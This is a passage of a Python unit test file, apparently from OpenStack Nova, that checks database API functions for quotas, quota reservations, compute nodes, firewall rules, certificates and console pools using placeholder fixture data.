self.ctxt, param['user_id'], param['name'])
def test_key_pair_destroy_no_such_key(self):
param = {'name': 'test_1', 'user_id': 'test_user_id_1'}
self.assertRaises(exception.KeypairNotFound,
db.key_pair_destroy, self.ctxt,
param['user_id'], param['name'])
class QuotaTestCase(test.TestCase, ModelsObjectComparatorMixin):
"""Tests for db.api.quota_* methods."""
def setUp(self):
super(QuotaTestCase, self).setUp()
self.ctxt = context.get_admin_context()
def test_quota_create(self):
quota = db.quota_create(self.ctxt, 'project1', 'resource', 99)
self.assertEqual(quota.resource, 'resource')
self.assertEqual(quota.hard_limit, 99)
self.assertEqual(quota.project_id, 'project1')
def test_quota_get(self):
quota = db.quota_create(self.ctxt, 'project1', 'resource', 99)
quota_db = db.quota_get(self.ctxt, 'project1', 'resource')
self._assertEqualObjects(quota, quota_db)
def test_quota_get_all_by_project(self):
for i in range(3):
for j in range(3):
db.quota_create(self.ctxt, 'proj%d' % i, 'resource%d' % j, j)
for i in range(3):
quotas_db = db.quota_get_all_by_project(self.ctxt, 'proj%d' % i)
self.assertEqual(quotas_db, {'project_id': 'proj%d' % i,
'resource0': 0,
'resource1': 1,
'resource2': 2})
def test_quota_get_all_by_project_and_user(self):
for i in range(3):
for j in range(3):
db.quota_create(self.ctxt, 'proj%d' % i, 'resource%d' % j,
j - 1, user_id='user%d' % i)
for i in range(3):
quotas_db = db.quota_get_all_by_project_and_user(self.ctxt,
'proj%d' % i,
'user%d' % i)
self.assertEqual(quotas_db, {'project_id': 'proj%d' % i,
'user_id': 'user%d' % i,
'resource0': -1,
'resource1': 0,
'resource2': 1})
def test_quota_update(self):
db.quota_create(self.ctxt, 'project1', 'resource1', 41)
db.quota_update(self.ctxt, 'project1', 'resource1', 42)
quota = db.quota_get(self.ctxt, 'project1', 'resource1')
self.assertEqual(quota.hard_limit, 42)
self.assertEqual(quota.resource, 'resource1')
self.assertEqual(quota.project_id, 'project1')
def test_quota_update_nonexistent(self):
self.assertRaises(exception.ProjectQuotaNotFound,
db.quota_update, self.ctxt, 'project1', 'resource1', 42)
def test_quota_get_nonexistent(self):
self.assertRaises(exception.ProjectQuotaNotFound,
db.quota_get, self.ctxt, 'project1', 'resource1')
def test_quota_reserve_all_resources(self):
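        # Create a quota and a reservation delta for every reservable
        # resource, build matching usage data (instances, fixed IPs,
        # floating IPs, security groups and server groups), then check
        # that quota_reserve records the expected in_use and reserved
        # values for each resource.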
quotas = {}
deltas = {}
reservable_resources = {}
for i, resource in enumerate(quota.resources):
if isinstance(resource, quota.ReservableResource):
quotas[resource.name] = db.quota_create(self.ctxt, 'project1',
resource.name,
100).hard_limit
deltas[resource.name] = i
reservable_resources[resource.name] = resource
usages = {'instances': 3, 'cores': 6, 'ram': 9}
instances = []
for i in range(3):
instances.append(db.instance_create(self.ctxt,
{'vcpus': 2, 'memory_mb': 3,
'project_id': 'project1'}))
usages['fixed_ips'] = 2
network = db.network_create_safe(self.ctxt, {})
for i in range(2):
address = '192.168.0.%d' % i
db.fixed_ip_create(self.ctxt, {'project_id': 'project1',
'address': address,
'network_id': network['id']})
db.fixed_ip_associate(self.ctxt, address,
instances[0].uuid, network['id'])
usages['floating_ips'] = 5
for i in range(5):
db.floating_ip_create(self.ctxt, {'project_id': 'project1'})
usages['security_groups'] = 3
for i in range(3):
db.security_group_create(self.ctxt, {'project_id': 'project1'})
usages['server_groups'] = 4
for i in range(4):
db.instance_group_create(self.ctxt, {'uuid': str(i),
'project_id': 'project1'})
reservations_uuids = db.quota_reserve(self.ctxt, reservable_resources,
quotas, quotas, deltas, None,
None, None, 'project1')
resources_names = list(reservable_resources.keys())
for reservation_uuid in reservations_uuids:
reservation = _reservation_get(self.ctxt, reservation_uuid)
usage = db.quota_usage_get(self.ctxt, 'project1',
reservation.resource)
self.assertEqual(usage.in_use, usages[reservation.resource],
'Resource: %s' % reservation.resource)
self.assertEqual(usage.reserved, deltas[reservation.resource])
self.assertIn(reservation.resource, resources_names)
resources_names.remove(reservation.resource)
self.assertEqual(len(resources_names), 0)
def test_quota_destroy_all_by_project(self):
reservations = _quota_reserve(self.ctxt, 'project1', 'user1')
db.quota_destroy_all_by_project(self.ctxt, 'project1')
self.assertEqual(db.quota_get_all_by_project(self.ctxt, 'project1'),
{'project_id': 'project1'})
self.assertEqual(db.quota_get_all_by_project_and_user(self.ctxt,
'project1', 'user1'),
{'project_id': 'project1', 'user_id': 'user1'})
self.assertEqual(db.quota_usage_get_all_by_project(
self.ctxt, 'project1'),
{'project_id': 'project1'})
for r in reservations:
self.assertRaises(exception.ReservationNotFound,
_reservation_get, self.ctxt, r)
def test_quota_destroy_all_by_project_and_user(self):
reservations = _quota_reserve(self.ctxt, 'project1', 'user1')
db.quota_destroy_all_by_project_and_user(self.ctxt, 'project1',
'user1')
self.assertEqual(db.quota_get_all_by_project_and_user(self.ctxt,
'project1', 'user1'),
{'project_id': 'project1',
'user_id': 'user1'})
self.assertEqual(db.quota_usage_get_all_by_project_and_user(
self.ctxt, 'project1', 'user1'),
{'project_id': 'project1',
'user_id': 'user1',
'fixed_ips': {'in_use': 2, 'reserved': 2}})
for r in reservations:
self.assertRaises(exception.ReservationNotFound,
_reservation_get, self.ctxt, r)
def test_quota_usage_get_nonexistent(self):
self.assertRaises(exception.QuotaUsageNotFound, db.quota_usage_get,
self.ctxt, 'p1', 'nonexitent_resource')
def test_quota_usage_get(self):
_quota_reserve(self.ctxt, 'p1', 'u1')
quota_usage = db.quota_usage_get(self.ctxt, 'p1', 'resource0')
expected = {'resource': 'resource0', 'project_id': 'p1',
'in_use': 0, 'reserved': 0, 'total': 0}
for key, value in expected.items():
self.assertEqual(value, quota_usage[key])
def test_quota_usage_get_all_by_project(self):
_quota_reserve(self.ctxt, 'p1', 'u1')
expected = {'project_id': 'p1',
'resource0': {'in_use': 0, 'reserved': 0},
'resource1': {'in_use': 1, 'reserved': 1},
'fixed_ips': {'in_use': 2, 'reserved': 2}}
self.assertEqual(expected, db.quota_usage_get_all_by_project(
self.ctxt, 'p1'))
def test_quota_usage_get_all_by_project_and_user(self):
_quota_reserve(self.ctxt, 'p1', 'u1')
expected = {'project_id': 'p1',
'user_id': 'u1',
'resource0': {'in_use': 0, 'reserved': 0},
'resource1': {'in_use': 1, 'reserved': 1},
'fixed_ips': {'in_use': 2, 'reserved': 2}}
self.assertEqual(expected, db.quota_usage_get_all_by_project_and_user(
self.ctxt, 'p1', 'u1'))
def test_quota_usage_update_nonexistent(self):
self.assertRaises(exception.QuotaUsageNotFound, db.quota_usage_update,
self.ctxt, 'p1', 'u1', 'resource', in_use=42)
def test_quota_usage_update(self):
_quota_reserve(self.ctxt, 'p1', 'u1')
db.quota_usage_update(self.ctxt, 'p1', 'u1', 'resource0', in_use=42,
reserved=43)
quota_usage = db.quota_usage_get(self.ctxt, 'p1', 'resource0', 'u1')
expected = {'resource': 'resource0', 'project_id': 'p1',
'user_id': 'u1', 'in_use': 42, 'reserved': 43, 'total': 85}
for key, value in expected.items():
self.assertEqual(value, quota_usage[key])
def test_quota_create_exists(self):
db.quota_create(self.ctxt, 'project1', 'resource1', 41)
self.assertRaises(exception.QuotaExists, db.quota_create, self.ctxt,
'project1', 'resource1', 42)
class QuotaReserveNoDbTestCase(test.NoDBTestCase):
"""Tests quota reserve/refresh operations using mock."""
def test_create_quota_usage_if_missing_not_created(self):
# Tests that QuotaUsage isn't created if it's already in user_usages.
resource = 'fake-resource'
project_id = 'fake-project'
user_id = 'fake_user'
session = mock.sentinel
quota_usage = mock.sentinel
user_usages = {resource: quota_usage}
with mock.patch.object(sqlalchemy_api, '_quota_usage_create') as quc:
self.assertFalse(sqlalchemy_api._create_quota_usage_if_missing(
user_usages, resource, None,
project_id, user_id, session))
self.assertFalse(quc.called)
def _test_create_quota_usage_if_missing_created(self, per_project_quotas):
# Tests that the QuotaUsage is created.
user_usages = {}
if per_project_quotas:
resource = sqlalchemy_api.PER_PROJECT_QUOTAS[0]
else:
resource = 'fake-resource'
project_id = 'fake-project'
user_id = 'fake_user'
session = mock.sentinel
quota_usage = mock.sentinel
with mock.patch.object(sqlalchemy_api, '_quota_usage_create',
return_value=quota_usage) as quc:
self.assertTrue(sqlalchemy_api._create_quota_usage_if_missing(
user_usages, resource, None,
project_id, user_id, session))
self.assertEqual(quota_usage, user_usages[resource])
# Now test if the QuotaUsage was created with a user_id or not.
if per_project_quotas:
quc.assert_called_once_with(
project_id, None, resource, 0, 0, None, session=session)
else:
quc.assert_called_once_with(
project_id, user_id, resource, 0, 0, None, session=session)
def test_create_quota_usage_if_missing_created_per_project_quotas(self):
self._test_create_quota_usage_if_missing_created(True)
def test_create_quota_usage_if_missing_created_user_quotas(self):
self._test_create_quota_usage_if_missing_created(False)
def test_is_quota_refresh_needed_in_use(self):
# Tests when a quota refresh is needed based on the in_use value.
for in_use in range(-1, 1):
            # We have to set until_refresh=None, otherwise mock will give it
            # a value that runs some code we don't want.
quota_usage = mock.MagicMock(in_use=in_use, until_refresh=None)
if in_use < 0:
self.assertTrue(sqlalchemy_api._is_quota_refresh_needed(
quota_usage, max_age=0))
else:
self.assertFalse(sqlalchemy_api._is_quota_refresh_needed(
quota_usage, max_age=0))
def test_is_quota_refresh_needed_until_refresh_none(self):
quota_usage = mock.MagicMock(in_use=0, until_refresh=None)
self.assertFalse(sqlalchemy_api._is_quota_refresh_needed(quota_usage,
max_age=0))
def test_is_quota_refresh_needed_until_refresh_not_none(self):
# Tests different values for the until_refresh counter.
for until_refresh in range(3):
quota_usage = mock.MagicMock(in_use=0, until_refresh=until_refresh)
refresh = sqlalchemy_api._is_quota_refresh_needed(quota_usage,
max_age=0)
until_refresh -= 1
if until_refresh <= 0:
self.assertTrue(refresh)
else:
self.assertFalse(refresh)
self.assertEqual(until_refresh, quota_usage.until_refresh)
def test_refresh_quota_usages(self):
quota_usage = mock.Mock(spec=models.QuotaUsage)
quota_usage.in_use = 5
quota_usage.until_refresh = None
sqlalchemy_api._refresh_quota_usages(quota_usage, until_refresh=5,
in_use=6)
self.assertEqual(6, quota_usage.in_use)
self.assertEqual(5, quota_usage.until_refresh)
def test_calculate_overquota_no_delta(self):
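        # A negative delta (releasing quota) must not be reported as
        # exceeding the quota.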
deltas = {'foo': -1}
user_quotas = {'foo': 10}
overs = sqlalchemy_api._calculate_overquota({}, user_quotas, deltas,
{}, {})
self.assertFalse(overs)
def test_calculate_overquota_unlimited_quota(self):
deltas = {'foo': 1}
project_quotas = {}
user_quotas = {'foo': -1}
project_usages = {}
user_usages = {'foo': 10}
overs = sqlalchemy_api._calculate_overquota(
project_quotas, user_quotas, deltas, project_usages, user_usages)
self.assertFalse(overs)
def _test_calculate_overquota(self, resource, project_usages, user_usages):
deltas = {resource: 1}
project_quotas = {resource: 10}
user_quotas = {resource: 10}
overs = sqlalchemy_api._calculate_overquota(
project_quotas, user_quotas, deltas, project_usages, user_usages)
self.assertEqual(resource, overs[0])
def test_calculate_overquota_per_project_quota_overquota(self):
# In this test, user quotas are fine but project quotas are over.
resource = 'foo'
project_usages = {resource: {'total': 10}}
user_usages = {resource: {'total': 5}}
self._test_calculate_overquota(resource, project_usages, user_usages)
def test_calculate_overquota_per_user_quota_overquota(self):
# In this test, project quotas are fine but user quotas are over.
resource = 'foo'
project_usages = {resource: {'total': 5}}
user_usages = {resource: {'total': 10}}
self._test_calculate_overquota(resource, project_usages, user_usages)
class QuotaClassTestCase(test.TestCase, ModelsObjectComparatorMixin):
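    """Tests for db.api.quota_class_* methods."""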
def setUp(self):
super(QuotaClassTestCase, self).setUp()
self.ctxt = context.get_admin_context()
def test_quota_class_get_default(self):
params = {
'test_resource1': '10',
'test_resource2': '20',
'test_resource3': '30',
}
for res, limit in params.items():
db.quota_class_create(self.ctxt, 'default', res, limit)
defaults = db.quota_class_get_default(self.ctxt)
self.assertEqual(defaults, dict(class_name='default',
test_resource1=10,
test_resource2=20,
test_resource3=30))
def test_quota_class_create(self):
qc = db.quota_class_create(self.ctxt, 'class name', 'resource', 42)
self.assertEqual(qc.class_name, 'class name')
self.assertEqual(qc.resource, 'resource')
self.assertEqual(qc.hard_limit, 42)
def test_quota_class_get(self):
qc = db.quota_class_create(self.ctxt, 'class name', 'resource', 42)
qc_db = db.quota_class_get(self.ctxt, 'class name', 'resource')
self._assertEqualObjects(qc, qc_db)
def test_quota_class_get_nonexistent(self):
self.assertRaises(exception.QuotaClassNotFound, db.quota_class_get,
self.ctxt, 'nonexistent', 'resource')
def test_quota_class_get_all_by_name(self):
for i in range(3):
for j in range(3):
db.quota_class_create(self.ctxt, 'class%d' % i,
'resource%d' % j, j)
for i in range(3):
classes = db.quota_class_get_all_by_name(self.ctxt, 'class%d' % i)
self.assertEqual(classes, {'class_name': 'class%d' % i,
'resource0': 0, 'resource1': 1, 'resource2': 2})
def test_quota_class_update(self):
db.quota_class_create(self.ctxt, 'class name', 'resource', 42)
db.quota_class_update(self.ctxt, 'class name', 'resource', 43)
self.assertEqual(db.quota_class_get(self.ctxt, 'class name',
'resource').hard_limit, 43)
def test_quota_class_update_nonexistent(self):
self.assertRaises(exception.QuotaClassNotFound, db.quota_class_update,
self.ctxt, 'class name', 'resource', 42)
def test_refresh_quota_usages(self):
quota_usages = mock.Mock()
sqlalchemy_api._refresh_quota_usages(quota_usages, until_refresh=5,
in_use=6)
class S3ImageTestCase(test.TestCase):
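    """Tests for db.api.s3_image_* methods."""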
def setUp(self):
super(S3ImageTestCase, self).setUp()
self.ctxt = context.get_admin_context()
self.values = [uuidutils.generate_uuid() for i in range(3)]
self.images = [db.s3_image_create(self.ctxt, uuid)
for uuid in self.values]
def test_s3_image_create(self):
for ref in self.images:
self.assertTrue(uuidutils.is_uuid_like(ref.uuid))
self.assertEqual(sorted(self.values),
sorted([ref.uuid for ref in self.images]))
def test_s3_image_get_by_uuid(self):
for uuid in self.values:
ref = db.s3_image_get_by_uuid(self.ctxt, uuid)
self.assertTrue(uuidutils.is_uuid_like(ref.uuid))
self.assertEqual(uuid, ref.uuid)
def test_s3_image_get(self):
self.assertEqual(sorted(self.values),
sorted([db.s3_image_get(self.ctxt, ref.id).uuid
for ref in self.images]))
def test_s3_image_get_not_found(self):
self.assertRaises(exception.ImageNotFound, db.s3_image_get, self.ctxt,
100500)
def test_s3_image_get_by_uuid_not_found(self):
self.assertRaises(exception.ImageNotFound, db.s3_image_get_by_uuid,
self.ctxt, uuidutils.generate_uuid())
class ComputeNodeTestCase(test.TestCase, ModelsObjectComparatorMixin):
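    """Tests for db.api.compute_node_* methods."""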
_ignored_keys = ['id', 'deleted', 'deleted_at', 'created_at', 'updated_at']
def setUp(self):
super(ComputeNodeTestCase, self).setUp()
self.ctxt = context.get_admin_context()
self.service_dict = dict(host='host1', binary='nova-compute',
topic=CONF.compute_topic, report_count=1,
disabled=False)
self.service = db.service_create(self.ctxt, self.service_dict)
self.compute_node_dict = dict(vcpus=2, memory_mb=1024, local_gb=2048,
vcpus_used=0, memory_mb_used=0,
local_gb_used=0, free_ram_mb=1024,
free_disk_gb=2048, hypervisor_type="xen",
hypervisor_version=1, cpu_info="",
running_vms=0, current_workload=0,
service_id=self.service['id'],
host=self.service['host'],
disk_available_least=100,
hypervisor_hostname='abracadabra104',
host_ip='127.0.0.1',
supported_instances='',
pci_stats='',
metrics='',
extra_resources='',
stats='', numa_topology='')
# add some random stats
self.stats = dict(num_instances=3, num_proj_12345=2,
num_proj_23456=2, num_vm_building=3)
self.compute_node_dict['stats'] = jsonutils.dumps(self.stats)
self.flags(reserved_host_memory_mb=0)
self.flags(reserved_host_disk_mb=0)
self.item = db.compute_node_create(self.ctxt, self.compute_node_dict)
def test_compute_node_create(self):
self._assertEqualObjects(self.compute_node_dict, self.item,
ignored_keys=self._ignored_keys + ['stats'])
new_stats = jsonutils.loads(self.item['stats'])
self.assertEqual(self.stats, new_stats)
def test_compute_node_get_all(self):
nodes = db.compute_node_get_all(self.ctxt)
self.assertEqual(1, len(nodes))
node = nodes[0]
self._assertEqualObjects(self.compute_node_dict, node,
ignored_keys=self._ignored_keys +
['stats', 'service'])
new_stats = jsonutils.loads(node['stats'])
self.assertEqual(self.stats, new_stats)
def test_compute_node_get_all_deleted_compute_node(self):
# Create a service and compute node and ensure we can find its stats;
# delete the service and compute node when done and loop again
for x in range(2, 5):
# Create a service
service_data = self.service_dict.copy()
service_data['host'] = 'host-%s' % x
service = db.service_create(self.ctxt, service_data)
# Create a compute node
compute_node_data = self.compute_node_dict.copy()
compute_node_data['service_id'] = service['id']
compute_node_data['stats'] = jsonutils.dumps(self.stats.copy())
compute_node_data['hypervisor_hostname'] = 'hypervisor-%s' % x
node = db.compute_node_create(self.ctxt, compute_node_data)
# Ensure the "new" compute node is found
nodes = db.compute_node_get_all(self.ctxt)
self.assertEqual(2, len(nodes))
found = None
for n in nodes:
if n['id'] == node['id']:
found = n
break
self.assertIsNotNone(found)
# Now ensure the match has stats!
self.assertNotEqual(jsonutils.loads(found['stats']), {})
# Now delete the newly-created compute node to ensure the related
# compute node stats are wiped in a cascaded fashion
db.compute_node_delete(self.ctxt, node['id'])
# Clean up the service
db.service_destroy(self.ctxt, service['id'])
def test_compute_node_get_all_mult_compute_nodes_one_service_entry(self):
service_data = self.service_dict.copy()
service_data['host'] = 'host2'
service = db.service_create(self.ctxt, service_data)
existing_node = dict(self.item.iteritems())
expected = [existing_node]
for name in ['bm_node1', 'bm_node2']:
compute_node_data = self.compute_node_dict.copy()
compute_node_data['service_id'] = service['id']
compute_node_data['stats'] = jsonutils.dumps(self.stats)
compute_node_data['hypervisor_hostname'] = name
node = db.compute_node_create(self.ctxt, compute_node_data)
node = dict(node)
expected.append(node)
result = sorted(db.compute_node_get_all(self.ctxt),
key=lambda n: n['hypervisor_hostname'])
self._assertEqualListsOfObjects(expected, result,
ignored_keys=['stats'])
def test_compute_node_get_all_by_host_with_distinct_hosts(self):
# Create another service with another node
service2 = self.service_dict.copy()
service2['host'] = 'host2'
db.service_create(self.ctxt, service2)
compute_node_another_host = self.compute_node_dict.copy()
compute_node_another_host['stats'] = jsonutils.dumps(self.stats)
compute_node_another_host['hypervisor_hostname'] = 'node_2'
compute_node_another_host['host'] = 'host2'
node = db.compute_node_create(self.ctxt, compute_node_another_host)
result = db.compute_node_get_all_by_host(self.ctxt, 'host1', False)
self._assertEqualListsOfObjects([self.item], result)
result = db.compute_node_get_all_by_host(self.ctxt, 'host2', False)
self._assertEqualListsOfObjects([node], result)
def test_compute_node_get_all_by_host_with_same_host(self):
# Create another node on top of the same service
compute_node_same_host = self.compute_node_dict.copy()
compute_node_same_host['stats'] = jsonutils.dumps(self.stats)
compute_node_same_host['hypervisor_hostname'] = 'node_3'
node = db.compute_node_create(self.ctxt, compute_node_same_host)
expected = [self.item, node]
result = sorted(db.compute_node_get_all_by_host(
self.ctxt, 'host1', False),
key=lambda n: n['hypervisor_hostname'])
self._assertEqualListsOfObjects(expected, result,
ignored_keys=['stats'])
def test_compute_node_get_all_by_host_not_found(self):
self.assertRaises(exception.ComputeHostNotFound,
db.compute_node_get_all_by_host, self.ctxt, 'wrong')
def test_compute_nodes_get_by_service_id_one_result(self):
expected = [self.item]
result = db.compute_nodes_get_by_service_id(
self.ctxt, self.service['id'])
self._assertEqualListsOfObjects(expected, result,
ignored_keys=['stats'])
def test_compute_nodes_get_by_service_id_multiple_results(self):
# Create another node on top of the same service
compute_node_same_host = self.compute_node_dict.copy()
compute_node_same_host['stats'] = jsonutils.dumps(self.stats)
compute_node_same_host['hypervisor_hostname'] = 'node_2'
node = db.compute_node_create(self.ctxt, compute_node_same_host)
expected = [self.item, node]
result = sorted(db.compute_nodes_get_by_service_id(
self.ctxt, self.service['id']),
key=lambda n: n['hypervisor_hostname'])
self._assertEqualListsOfObjects(expected, result,
ignored_keys=['stats'])
def test_compute_nodes_get_by_service_id_not_found(self):
self.assertRaises(exception.ServiceNotFound,
db.compute_nodes_get_by_service_id, self.ctxt,
'fake')
def test_compute_node_get_by_host_and_nodename(self):
# Create another node on top of the same service
compute_node_same_host = self.compute_node_dict.copy()
compute_node_same_host['stats'] = jsonutils.dumps(self.stats)
compute_node_same_host['hypervisor_hostname'] = 'node_2'
node = db.compute_node_create(self.ctxt, compute_node_same_host)
expected = node
result = db.compute_node_get_by_host_and_nodename(
self.ctxt, 'host1', 'node_2')
self._assertEqualObjects(expected, result)
def test_compute_node_get_by_host_and_nodename_not_found(self):
self.assertRaises(exception.ComputeHostNotFound,
db.compute_node_get_by_host_and_nodename,
self.ctxt, 'host1', 'wrong')
def test_compute_node_get(self):
compute_node_id = self.item['id']
node = db.compute_node_get(self.ctxt, compute_node_id)
self._assertEqualObjects(self.compute_node_dict, node,
ignored_keys=self._ignored_keys + ['stats', 'service'])
new_stats = jsonutils.loads(node['stats'])
self.assertEqual(self.stats, new_stats)
def test_compute_node_update(self):
compute_node_id = self.item['id']
stats = jsonutils.loads(self.item['stats'])
# change some values:
stats['num_instances'] = 8
stats['num_tribbles'] = 1
values = {
'vcpus': 4,
'stats': jsonutils.dumps(stats),
}
item_updated = db.compute_node_update(self.ctxt, compute_node_id,
values)
self.assertEqual(4, item_updated['vcpus'])
new_stats = jsonutils.loads(item_updated['stats'])
self.assertEqual(stats, new_stats)
def test_compute_node_delete(self):
compute_node_id = self.item['id']
db.compute_node_delete(self.ctxt, compute_node_id)
nodes = db.compute_node_get_all(self.ctxt)
self.assertEqual(len(nodes), 0)
def test_compute_node_search_by_hypervisor(self):
nodes_created = []
new_service = copy.copy(self.service_dict)
for i in range(3):
new_service['binary'] += str(i)
new_service['topic'] += str(i)
service = db.service_create(self.ctxt, new_service)
self.compute_node_dict['service_id'] = service['id']
self.compute_node_dict['hypervisor_hostname'] = 'testhost' + str(i)
self.compute_node_dict['stats'] = jsonutils.dumps(self.stats)
node = db.compute_node_create(self.ctxt, self.compute_node_dict)
nodes_created.append(node)
nodes = db.compute_node_search_by_hypervisor(self.ctxt, 'host')
self.assertEqual(3, len(nodes))
self._assertEqualListsOfObjects(nodes_created, nodes,
ignored_keys=self._ignored_keys + ['stats', 'service'])
def test_compute_node_statistics(self):
stats = db.compute_node_statistics(self.ctxt)
self.assertEqual(stats.pop('count'), 1)
for k, v in stats.items():
self.assertEqual(v, self.item[k])
def test_compute_node_statistics_disabled_service(self):
serv = db.service_get_by_host_and_topic(
self.ctxt, 'host1', CONF.compute_topic)
db.service_update(self.ctxt, serv['id'], {'disabled': True})
stats = db.compute_node_statistics(self.ctxt)
self.assertEqual(stats.pop('count'), 0)
def test_compute_node_statistics_with_old_service_id(self):
        # NOTE(sbauza): This test is only for checking backwards compatibility
        # with old versions of compute_nodes not providing the host column.
        # This test could be removed once we are sure that all compute nodes
        # are populating the host field thanks to the ResourceTracker.
service2 = self.service_dict.copy()
service2['host'] = 'host2'
db_service2 = db.service_create(self.ctxt, service2)
compute_node_old_host = self.compute_node_dict.copy()
compute_node_old_host['stats'] = jsonutils.dumps(self.stats)
compute_node_old_host['hypervisor_hostname'] = 'node_2'
compute_node_old_host['service_id'] = db_service2['id']
compute_node_old_host.pop('host')
db.compute_node_create(self.ctxt, compute_node_old_host)
stats = db.compute_node_statistics(self.ctxt)
self.assertEqual(2, stats.pop('count'))
def test_compute_node_statistics_with_other_service(self):
other_service = self.service_dict.copy()
other_service['topic'] = 'fake-topic'
other_service['binary'] = 'nova-fake'
db.service_create(self.ctxt, other_service)
stats = db.compute_node_statistics(self.ctxt)
data = {'count': 1,
'vcpus_used': 0,
'local_gb_used': 0,
'memory_mb': 1024,
'current_workload': 0,
'vcpus': 2,
'running_vms': 0,
'free_disk_gb': 2048,
'disk_available_least': 100,
'local_gb': 2048,
'free_ram_mb': 1024,
'memory_mb_used': 0}
for key, value in six.iteritems(data):
self.assertEqual(value, stats.pop(key))
def test_compute_node_not_found(self):
self.assertRaises(exception.ComputeHostNotFound, db.compute_node_get,
self.ctxt, 100500)
def test_compute_node_update_always_updates_updated_at(self):
item_updated = db.compute_node_update(self.ctxt,
self.item['id'], {})
self.assertNotEqual(self.item['updated_at'],
item_updated['updated_at'])
def test_compute_node_update_override_updated_at(self):
# Update the record once so updated_at is set.
first = db.compute_node_update(self.ctxt, self.item['id'],
{'free_ram_mb': '12'})
self.assertIsNotNone(first['updated_at'])
# Update a second time. Make sure that the updated_at value we send
# is overridden.
second = db.compute_node_update(self.ctxt, self.item['id'],
{'updated_at': first.updated_at,
'free_ram_mb': '13'})
self.assertNotEqual(first['updated_at'], second['updated_at'])
def test_service_destroy_with_compute_node(self):
db.service_destroy(self.ctxt, self.service['id'])
self.assertRaises(exception.ComputeHostNotFound,
db.compute_node_get, self.ctxt,
self.item['id'])
def test_service_destroy_with_old_compute_node(self):
        # NOTE(sbauza): This test is only for checking backwards compatibility
        # with old versions of compute_nodes not providing the host column.
        # This test could be removed once we are sure that all compute nodes
        # are populating the host field thanks to the ResourceTracker.
compute_node_old_host_dict = self.compute_node_dict.copy()
compute_node_old_host_dict.pop('host')
item_old = db.compute_node_create(self.ctxt,
compute_node_old_host_dict)
db.service_destroy(self.ctxt, self.service['id'])
self.assertRaises(exception.ComputeHostNotFound,
db.compute_node_get, self.ctxt,
item_old['id'])
class ProviderFwRuleTestCase(test.TestCase, ModelsObjectComparatorMixin):
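    """Tests for db.api.provider_fw_rule_* methods."""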
def setUp(self):
super(ProviderFwRuleTestCase, self).setUp()
self.ctxt = context.get_admin_context()
self.values = self._get_rule_values()
self.rules = [db.provider_fw_rule_create(self.ctxt, rule)
for rule in self.values]
def _get_rule_values(self):
cidr_samples = ['192.168.0.0/24', '10.1.2.3/32',
'2001:4f8:3:ba::/64',
'2001:4f8:3:ba:2e0:81ff:fe22:d1f1/128']
values = []
for i in range(len(cidr_samples)):
rule = {}
rule['protocol'] = 'foo' + str(i)
rule['from_port'] = 9999 + i
rule['to_port'] = 9898 + i
rule['cidr'] = cidr_samples[i]
values.append(rule)
return values
def test_provider_fw_rule_create(self):
ignored_keys = ['id', 'deleted', 'deleted_at', 'created_at',
'updated_at']
for i, rule in enumerate(self.values):
self._assertEqualObjects(self.rules[i], rule,
ignored_keys=ignored_keys)
def test_provider_fw_rule_get_all(self):
self._assertEqualListsOfObjects(self.rules,
db.provider_fw_rule_get_all(self.ctxt))
def test_provider_fw_rule_destroy(self):
for rule in self.rules:
db.provider_fw_rule_destroy(self.ctxt, rule.id)
self.assertEqual([], db.provider_fw_rule_get_all(self.ctxt))
class CertificateTestCase(test.TestCase, ModelsObjectComparatorMixin):
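    """Tests for db.api.certificate_* methods."""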
def setUp(self):
super(CertificateTestCase, self).setUp()
self.ctxt = context.get_admin_context()
self.created = self._certificates_create()
def _get_certs_values(self):
base_values = {
'user_id': 'user',
'project_id': 'project',
'file_name': 'filename'
}
return [{k: v + str(x) for k, v in base_values.items()}
for x in range(1, 4)]
def _certificates_create(self):
return [db.certificate_create(self.ctxt, cert)
for cert in self._get_certs_values()]
def test_certificate_create(self):
ignored_keys = ['id', 'deleted', 'deleted_at', 'created_at',
'updated_at']
for i, cert in enumerate(self._get_certs_values()):
self._assertEqualObjects(self.created[i], cert,
ignored_keys=ignored_keys)
def test_certificate_get_all_by_project(self):
cert = db.certificate_get_all_by_project(self.ctxt,
self.created[1].project_id)
self._assertEqualObjects(self.created[1], cert[0])
def test_certificate_get_all_by_user(self):
cert = db.certificate_get_all_by_user(self.ctxt,
self.created[1].user_id)
self._assertEqualObjects(self.created[1], cert[0])
def test_certificate_get_all_by_user_and_project(self):
cert = db.certificate_get_all_by_user_and_project(self.ctxt,
self.created[1].user_id, self.created[1].project_id)
self._assertEqualObjects(self.created[1], cert[0])
class ConsoleTestCase(test.TestCase, ModelsObjectComparatorMixin):
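    """Tests for db.api.console_* methods."""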
def setUp(self):
super(ConsoleTestCase, self).setUp()
self.ctxt = context.get_admin_context()
pools_data = [
{'address': '192.168.10.10',
'username': 'user1',
'password': 'passwd1',
'console_type': 'type1',
'public_hostname': 'public_host1',
'host': 'host1',
'compute_host': 'compute_host1',
},
{'address': '192.168.10.11',
'username': 'user2',
'password': 'passwd2',
'console_type': 'type2',
'public_hostname': 'public_host2',
'host': 'host2',
'compute_host': 'compute_host2',
},
]
self.console_pools = [db.console_pool_create(self.ctxt, val)
for val in pools_data]
instance_uuid = uuidutils.generate_uuid()
db.instance_create(self.ctxt, {'uuid': instance_uuid})
self.console_data = [{'instance_name': 'name' + str(x),
'instance_uuid': instance_uuid,
'password': 'pass' + str(x),
'port': 7878 + x,
'pool_id': self.console_pools[x]['id']}
for x in range(len(pools_data))]
self.consoles = [db.console_create(self.ctxt, val)
for val in self.console_data]
def test_console_create(self):
ignored_keys = ['id', 'deleted', 'deleted_at', 'created_at',
'updated_at']
for console in self.consoles:
self.assertIsNotNone(console['id'])
self._assertEqualListsOfObjects(self.console_data, self.consoles,
ignored_keys=ignored_keys)
def test_console_get_by_id(self):
console = self.consoles[0]
console_get = db.console_get(self.ctxt, console['id'])
self._assertEqualObjects(console, console_get,
ignored_keys=['pool'])
def test_console_get_by_id_uuid(self):
console = self.consoles[0]
console_get = db.console_get(self.ctxt, console['id'],
console['instance_uuid'])
self._assertEqualObjects(console, console_get,
ignored_keys=['pool'])
def test_console_get_by_pool_instance(self):
console = self.consoles[0]
console_get = db.console_get_by_pool_instance(self.ctxt,
console['pool_id'], console['instance_uuid'])
self._assertEqualObjects(console, console_get,
ignored_keys=['pool'])
def test_console_get_all_by_instance(self):
instance_uuid = self.consoles[0]['instance_uuid']
consoles_get = db.console_get_all_by_instance(self.ctxt, instance_uuid)
self._assertEqualListsOfObjects(self.consoles, consoles_get)
def test_console_get_all_by_instance_with_pool(self):
instance_uuid = self.consoles[0]['instance_uuid']
consoles_get = db.console_get_all_by_instance(self.ctxt, instance_uuid,
